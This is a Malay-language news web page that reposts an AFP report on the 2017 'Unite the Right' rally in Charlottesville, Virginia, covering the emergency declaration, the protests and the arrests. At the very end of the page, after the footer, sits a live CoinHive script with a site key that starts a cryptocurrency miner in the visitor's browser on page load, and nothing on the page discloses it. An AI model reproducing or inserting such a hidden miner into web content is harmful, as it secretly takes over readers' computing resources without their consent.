© Copyright 2017, All Rights Reserved
Home / Semasa / Pelampau kulit putih buat kecoh di Virginia | Amerika

Pelampau kulit putih buat kecoh di Virginia | Amerika

CHARLOTTESVILLE, Virginia: Perintah darurat diisytiharkan di bandar raya ini berikutan kebanjiran penunjuk perasaan kulit putih selain perhimpunan membantah himpunan itu.

Ribuan penduduk dijangka membanjiri bandar raya ini sama ada untuk menyertai perhimpunan menyokong atau membantah ‘Unite the Right Rally’, beberapa jam selepas ratusan penunjuk perasaan yang membawa obor berhimpun di kampus universiti.

Kelmarin, gabenor negeri itu, Terry McAuliffe, dalam kenyataan menggesa penduduk tidak menghadiri perhimpunan tetapi awal semalam ratusan penunjuk perasaan kedua-dua pihak mula hadir.

Polis mula mengosongkan Taman Emancipation bandar raya itu dan membuat tangkapan selepas menyuraikan mereka yang berkumpul di situ untuk menyertai ‘perhimpunan haram’.

Dua kecederaan serius tetapi tidak membahayakan nyawa dilaporkan, kata polis di Twitter.

Berikutan ketegangan itu, pemimpin bandar raya berkenaan mengumumkan darurat, berikutan ancaman gangguan sivil, kekecohan, kecederaan kepada orang ramai dan kemusnahan harta awam dan peribadi yang teruk serta tahap mencukupi untuk membolehkan tindakan selaras kerajaan tempatan. – AFP


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Penyokong Pas serbu pejabat PAN Salor, mahu rampas bangunan

KUALA LUMPUR – Kira-kira 300 orang, melibatkan ahli dan penyokong dari Pas ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();